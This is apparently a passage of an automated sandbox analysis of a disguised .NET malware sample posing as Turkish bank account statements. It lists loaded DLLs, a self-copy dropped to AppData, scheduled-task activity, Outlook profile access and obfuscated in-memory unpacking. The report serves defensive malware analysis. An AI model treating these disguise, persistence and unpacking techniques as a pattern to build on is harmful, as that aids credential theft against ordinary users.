Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Section loaded: dpapi.dll

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: jXEBK.pdbSHA256 source: Hesap_Hareketleri_09122024_html.exe, EfgRyiVrT.exe.1.dr
Source:	Binary string: jXEBK.pdb source: Hesap_Hareketleri_09122024_html.exe, EfgRyiVrT.exe.1.dr

Data Obfuscation

.NET source code contains potential unpacker

Source: Hesap_Hareketleri_09122024_html.exe, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: EfgRyiVrT.exe.1.dr, Form1.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, c6qRU92LmfTIB8Prt7.cs	.Net Code: sJoOJGj1EJ System.Reflection.Assembly.Load(byte[])
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, c6qRU92LmfTIB8Prt7.cs	.Net Code: sJoOJGj1EJ System.Reflection.Assembly.Load(byte[])

Source: Hesap_Hareketleri_09122024_html.exe

Static PE information: 0x82004D95 [Fri Feb 11 17:25:41 2039 UTC]

Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D9C30 push esp; retf 02D1h	9_2_012D9D55
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D45F5 pushad ; ret	9_2_012D45C6
Source: C:\Users\user\Desktop\Hesap_Hareketleri_09122024_html.exe	Code function: 9_2_012D46CD pushad ; ret	9_2_012D4705
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_074CF892 push esp; retf	10_2_074CF8B1
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D7647 push ecx; iretd	10_2_075D7649
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D760C push edx; iretd	10_2_075D760D
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D3E08 push eax; retf	10_2_075D3E15
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D75C4 push edx; iretd	10_2_075D75C5
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D75E1 push edx; iretd	10_2_075D75E3
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D3CE8 push eax; retf	10_2_075D3E15
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075D7B85 pushad ; iretd	10_2_075D7B86
Source: C:\Users\user\AppData\Roaming\EfgRyiVrT.exe	Code function: 10_2_075DB235 push ss; iretd	10_2_075DB237

Source: Hesap_Hareketleri_09122024_html.exe	Static PE information: section name: .text entropy: 6.942209019187486
Source: EfgRyiVrT.exe.1.dr	Static PE information: section name: .text entropy: 6.942209019187486

Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, DhVQ0BTGCDSJ4yARoB.cs	High entropy of concatenated method names: 'Lq1PcqKJSG', 'p50PxHmZ5r', 'D8bPbshHH6', 'hCcPMuLHn3', 'b0uPuR7lbH', 'rduPno43yj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, tW1HUFddho4t4Ar7XOh.cs	High entropy of concatenated method names: 'LVCPNyHA49', 'AaGPzaQWgj', 'Phoykk89Nk', 'IJ3yr12M3K', 'Lity6aUw24', 'vI5yBQ0sud', 'VHZyOiYJK2', 'DhoyYTx8Bc', 'VfByfYlueW', 'CDQylMNTkB'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, Yf1N93G4tPgmC9dVf6.cs	High entropy of concatenated method names: 'q3jbY8Db16', 'mOublM7s0a', 'weqbxpH6hP', 'O7VbMwmaHg', 'NsUbnB5owY', 'jVaxihQMMm', 'fG8xVZ3rDf', 'wZsx9Z6Gu2', 'OwFxjoljWj', 'vTIxvbR0mS'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, JcnijZdZXmtDmGxsx5H.cs	High entropy of concatenated method names: 'jM4yN9ZdJS', 'IJlyzinxh3', 'hDPSkkD5Dc', 'pmGUHv8nBkaGmUGlKw1', 's23AsJ8zC0RBf7ZMwPS', 'NJmx0qoZdKH8gpLnNL9', 'PGn6bKo2rXX5k7igqJ2'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, qQEWPTmuI0umarePyZ.cs	High entropy of concatenated method names: 'r6qG3L5M1h', 'zRiGZSYy6E', 'wXoG2At395', 'DIhGaDTqtw', 'Rg7GW5WpXS', 'SUAGonccR6', 'oonGL2bAY8', 'NBRGEiodI7', 'RZJGDRBRl7', 'ipbGC8Pymn'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, kPsrU9xXa4un9JKFGv.cs	High entropy of concatenated method names: 'qLiJX8jIp', 'sIwACpQAO', 'J2uRMco3d', 'XebFhBiGh', 'PGAgVwavE', 'fdxwhJP2j', 'GHkHcpL9tFwf3hPDJQ', 'RDJhKwaoGLhLMk7bKV', 'fDXXWMxmU', 'QRSPCumKY'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, Ko7IMtf4CrY0h1WQOu.cs	High entropy of concatenated method names: 'Dispose', 'oeervpgH9B', 'mlG6Wdh2pP', 'PGeSiJCcmn', 'bILrNqnZYd', 'rAJrz8KRDP', 'ProcessDialogKey', 'dDs6k4XmoY', 'eDU6rSE1We', 'LDv66VLNBR'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, CW80Qut4BpiAjVjpYc.cs	High entropy of concatenated method names: 'ToString', 'GOLQhjERu0', 'ygaQWMuLoe', 'ly4QoeMMpB', 'CWoQLevM9X', 'qGMQEdo0nX', 'AmXQD7ooUG', 'JUcQCn1Xp4', 'Aa7Qs9Hb6q', 'bgfQdAnSva'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, dY1Tqkdy6ok8obEuYlU.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'C91SuVtQwV', 'H2SSPRTiL8', 'FQNSyJVsTW', 'q3YSSUg3DH', 'O1JSUKYwjg', 'NVPSIXCs0B', 'r9DSqPpJX1'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, r0d7cDQUweiaQEsmgN.cs	High entropy of concatenated method names: 'sRZu5wmGkG', 'Y8auWRnorv', 'yx2uo9Ky5B', 'XThuL6G1T3', 'C9CuEKdIij', 't24uDKiMY5', 'q8LuC8WqMp', 'WLuusvHwG0', 'pa5udu3xZA', 'afyu30AQGC'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, u5ODOojcVMB5v7DYoZ.cs	High entropy of concatenated method names: 'gv3l2XxjpQ', 'jKBlaLFBiw', 'giol0ST8Wa', 'N0TlTTlWZv', 'J7YliWgbLy', 'fqMlVb06Oe', 'XUIl9Davi7', 'cHXljw2Dje', 'YnMlv8sYJ9', 'Hx4lNuEbDq'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, c6qRU92LmfTIB8Prt7.cs	High entropy of concatenated method names: 'lMYBYAv8lt', 'y97BfCPdt7', 'ttoBl28Zby', 'gCEBc2iAAN', 'xfwBxbIUNL', 'iVsBbNmheZ', 'VjSBMTQ61m', 'T5iBnmQk7V', 'cXtBmatoyM', 'zRUBH4hDmJ'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, fxEgcJ5NyhtOep4Fb0.cs	High entropy of concatenated method names: 'hE2uGQ16vP', 'xKBup4oxNJ', 'FSRuuaKjrb', 'aRpuylDgII', 'avuuUtXttB', 'Fq7uqMsrjU', 'Dispose', 'DWTXfTr4Wm', 'x0uXlToF59', 'wXwXcbjtNy'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, VMWaIyAQKMIEV0FD9T.cs	High entropy of concatenated method names: 'SqLMfm85EL', 'J8MMcYmEFt', 'vf6MbVvMCN', 'xnhbNa4ZJp', 'SsDbz0qO0R', 'PpQMkNBTu2', 'gX0MrDsKuE', 'FsIM6L3Uou', 'wSEMBP3Uxd', 'YdmMOOXo42'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, UDiiJnw1Hp79Jj03lb.cs	High entropy of concatenated method names: 'zOYM166WfT', 'lD6MeqYvOM', 'p2EMJroavD', 'pauMA9QrR6', 'fH9M4b8joq', 'T2FMRBZXNW', 'kMVMFFhMeF', 'eEnM7Gb8y8', 'HbIMgcKbK5', 'o9DMwcXVZK'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, BTgJ7sq3hJJtKiNPqn.cs	High entropy of concatenated method names: 'kRnpjfdJQg', 'ynopNDM0Pg', 'M3PXkUFZb5', 'uQ2Xr4bCF0', 'KU5phAHalq', 'qtKpZru6Ds', 'qAhpKJ3E5h', 'X15p25Q4Zi', 'YrVpathfIp', 'jSvp0kLDsn'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, VdQyoHdgnWIkCKlIlRI.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'fWuPhEcd4t', 'hFZPZDma1u', 'ewEPKg6lq5', 'fEiP2EndCB', 'WF5Pa5TLB6', 'ssQP0w1ed1', 'DyxPTtTM7S'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, To30UNLtC0nEtywNYt.cs	High entropy of concatenated method names: 'iF4bqtsL0I', 'jOnb1MsQkA', 'MfqbJbTHvE', 'J3ubALN5Sq', 'lMdbRd7gZD', 'QA6bFivqKW', 'iWobgItSZC', 'Ceqbw54Fn8', 'wvduQsI7cak5Cmx736E', 'cn9BtMIkGaGGdsyUoVZ'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, K5lqmHyu7ODhNUu77O.cs	High entropy of concatenated method names: 'yIkrMTMyGC', 'BdTrnJ9qRr', 'pW6rHEaV6K', 'Kiwr82ja03', 'qf2rGBXnuo', 'hvorQZrwr4', 'pZr9lKey8bLdeKQ6kd', 'Wbd3jV4ISBrxjN4WXb', 'I2prr3JEWo', 'HnJrBespKJ'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, YMBYk76LDorWkf26Xh.cs	High entropy of concatenated method names: 'HKncAHVNR8', 'Nx2cRRTxGv', 'xQ7c7nCDic', 'QBNcgc4xGU', 'rF7cG0HXUG', 'eircQPpHet', 'Aujcpq4mZy', 'CL4cXhQaXj', 'MPqcuLVYj2', 'j8UcPqh2Kj'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, EvlavFUWmZ7gF0BROA.cs	High entropy of concatenated method names: 'A7mx452YyY', 'XiAxFWxZeI', 'lKucoFujrn', 'D0kcLEBcYp', 'kBgcESkses', 'UhIcDhVvDB', 'mSfcCUlfhZ', 'kTtcsawrRS', 'JMscdx6ZwH', 'c22c3Q8JCk'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, KwHsDJzCn6bn4ZafAu.cs	High entropy of concatenated method names: 'KWCPRTyY47', 'eI2P7A0bhf', 'OUxPgHp76n', 'q5pP5HIuHo', 'jDdPWH02J8', 'iG2PLgUUCq', 'lQ0PEA5GdB', 'DjqPqXnNed', 'VMvP1NoWiy', 'FF2PeEgeWe'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.6ea0000.4.raw.unpack, K5Kam2hHP1AJp983HT.cs	High entropy of concatenated method names: 'RhQt7nrNVb', 'L6AtgmUwc2', 'HFVt5X0wNE', 'nCQtWaVhxX', 'bGQtLsaD71', 'GqOtEv9mOw', 'ehStC6oEHx', 'lP2tsPqomY', 'rAbt3A2GLH', 'oauthcKk2q'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, DhVQ0BTGCDSJ4yARoB.cs	High entropy of concatenated method names: 'Lq1PcqKJSG', 'p50PxHmZ5r', 'D8bPbshHH6', 'hCcPMuLHn3', 'b0uPuR7lbH', 'rduPno43yj', 'Next', 'Next', 'Next', 'NextBytes'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, tW1HUFddho4t4Ar7XOh.cs	High entropy of concatenated method names: 'LVCPNyHA49', 'AaGPzaQWgj', 'Phoykk89Nk', 'IJ3yr12M3K', 'Lity6aUw24', 'vI5yBQ0sud', 'VHZyOiYJK2', 'DhoyYTx8Bc', 'VfByfYlueW', 'CDQylMNTkB'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, Yf1N93G4tPgmC9dVf6.cs	High entropy of concatenated method names: 'q3jbY8Db16', 'mOublM7s0a', 'weqbxpH6hP', 'O7VbMwmaHg', 'NsUbnB5owY', 'jVaxihQMMm', 'fG8xVZ3rDf', 'wZsx9Z6Gu2', 'OwFxjoljWj', 'vTIxvbR0mS'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, JcnijZdZXmtDmGxsx5H.cs	High entropy of concatenated method names: 'jM4yN9ZdJS', 'IJlyzinxh3', 'hDPSkkD5Dc', 'pmGUHv8nBkaGmUGlKw1', 's23AsJ8zC0RBf7ZMwPS', 'NJmx0qoZdKH8gpLnNL9', 'PGn6bKo2rXX5k7igqJ2'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, qQEWPTmuI0umarePyZ.cs	High entropy of concatenated method names: 'r6qG3L5M1h', 'zRiGZSYy6E', 'wXoG2At395', 'DIhGaDTqtw', 'Rg7GW5WpXS', 'SUAGonccR6', 'oonGL2bAY8', 'NBRGEiodI7', 'RZJGDRBRl7', 'ipbGC8Pymn'
Source: 1.2.Hesap_Hareketleri_09122024_html.exe.3bf59a0.2.raw.unpack, kPsrU9xXa4un9JKFGv.cs	High entropy of concatenated method names: 'qLiJX8jIp', 'sIwACpQAO', 'J2uRMco3d', 'XebFhBiGh', 'PGAgVwavE', 'fdxwhJP2j', 'GHkHcpL9tFwf3hPDJQ', 'RDJhKwaoGLhLMk7bKV', 'fDXXWMxmU', 'QRSPCumKY'
